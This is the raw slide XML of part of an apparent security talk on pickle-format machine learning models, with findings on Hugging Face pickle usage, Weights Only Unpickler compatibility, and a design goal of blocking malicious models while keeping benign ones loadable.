            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Empirical Study</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p47"/>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545" name="Google Shape;545;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894300" y="1599950"/>
            <a:ext cx="7355400" cy="906900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Are pickle models used, despite alternative formats?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Hugging Face longitudinal study: ~2 year period (January 2023 – March 2025)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Finding: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>pickle downloads are increasing (2.1 billion monthly downloads)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>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9" name="Shape 549"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Google Shape;550;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Google Shape;551;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Empirical Study</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552;p48"/>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553" name="Google Shape;553;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894300" y="1599950"/>
            <a:ext cx="7355400" cy="906900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Are pickle models used, despite alternative formats?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Hugging Face longitudinal study: ~2 year period (January 2023 – March 2025)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Finding: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>pickle downloads are increasing (2.1 billion monthly downloads)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894300" y="3157375"/>
            <a:ext cx="7355400" cy="1051500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Can the Weights Only Unpickler load existing pickle models?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Traced pickle models in study</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Finding: among repositories with pickle models, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>15% contain pickle model that cannot be loaded by Weights Only Unpickler</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>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8" name="Shape 558"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="Google Shape;559;p49"/>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560" name="Google Shape;560;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284525" y="1512841"/>
            <a:ext cx="6575100" cy="557700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Google Shape;562;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284525" y="2657550"/>
            <a:ext cx="2027100" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Q1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Is this a problem?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563" name="Google Shape;563;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5832525" y="2657550"/>
            <a:ext cx="2027100" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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9E9E9E"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Q2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="9E9E9E"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> How do we fix it? </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="9E9E9E"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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7" name="Shape 567"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Google Shape;568;p50"/>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569" name="Google Shape;569;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284525" y="1512841"/>
            <a:ext cx="6575100" cy="557700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Google Shape;570;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284525" y="2657550"/>
            <a:ext cx="2027100" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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9E9E9E"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Q1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="9E9E9E"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Is this a problem?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="9E9E9E"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Google Shape;572;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5832525" y="2657550"/>
            <a:ext cx="2027100" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Q2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> How do we fix it? </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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6" name="Shape 576"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Google Shape;577;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Goal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="578" name="Google Shape;578;p51"/>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579" name="Google Shape;579;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573150" y="1317325"/>
            <a:ext cx="7997700" cy="570900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>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en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Requirement: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>prevent malicious models from executing unnecessary callables, but permit benign models to use callables necessary to load model. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Google Shape;580;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573150" y="2409975"/>
            <a:ext cx="7997700" cy="610200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Design goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>We aim to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>prioritize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> by blocking malicious models, but </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>improve usability</a:t>
            </a:r>
            <a:r>
